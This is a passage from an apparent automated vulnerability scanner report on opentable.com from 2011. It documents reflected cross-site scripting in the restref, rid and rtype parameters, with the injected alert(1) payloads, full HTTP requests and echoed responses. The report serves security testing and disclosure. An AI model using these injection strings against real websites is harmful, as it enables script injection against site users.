Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=39&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:57 GMT; path=/
Vary: Accept-Encoding
Content-Length: 41401


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
perties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90&m=4&t=single&p=2e8520';alert(1)//d273cd86d21&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = new Hash({});
Resul
...[SNIP]...
4.66. http://www.opentable.com/opentables.aspx [restref parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the restref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ace1b'%3balert(1)//78f95f9005e was submitted in the restref parameter. This input was echoed as ace1b';alert(1)//78f95f9005e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90ace1b'%3balert(1)//78f95f9005e&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a54&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:54 GMT; path=/
Vary: Accept-Encoding
Content-Length: 44265


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=90&restref=90ace1b';alert(1)//78f95f9005e&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.Prices = [2]
...[SNIP]...
4.67. http://www.opentable.com/opentables.aspx [rid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the rid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e5d7'%3balert(1)//598a6a122be was submitted in the rid parameter. This input was echoed as 2e5d7';alert(1)//598a6a122be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=902e5d7'%3balert(1)//598a6a122be&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:53 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a53&p1q=rid%3d90%26restref%3d90%26m%3d4%26t%3dsingle%26p%3d2&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=100&rr1=90&rr2=90; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=3&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 38316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
, 'mapimage':''};
ResultProperties.Response.FinalDistanceUsed = -1;
ResultProperties.Response.DistanceBubbleUpExecuted = false;
ResultProperties.Response.MapViewTabLink = 'opentables-map.aspx?rid=902e5d7';alert(1)//598a6a122be&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod&rp=opentables.aspx&mode=map';
ResultProperties.Response.BaseURL = 'httphandlers/opentables-lite.aspx?aj=1';
ResultProperties.InResults.P
...[SNIP]...
4.68. http://www.opentable.com/opentables.aspx [rtype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The value of the rtype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 579ed'%3balert(1)//e3acda3f130 was submitted in the rtype parameter. This input was echoed as 579ed';alert(1)//e3acda3f130 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod579ed'%3balert(1)//e3acda3f130 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:55:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a55%3a00&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=90&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=4&vbefreg=4&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref''&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=duSsdwBsMHJDxcQVxTQ3GQ%3d%3d&ts=3&st=5&js=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
Set-Cookie: pgseq=%00'; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:55:00 GMT; path=/
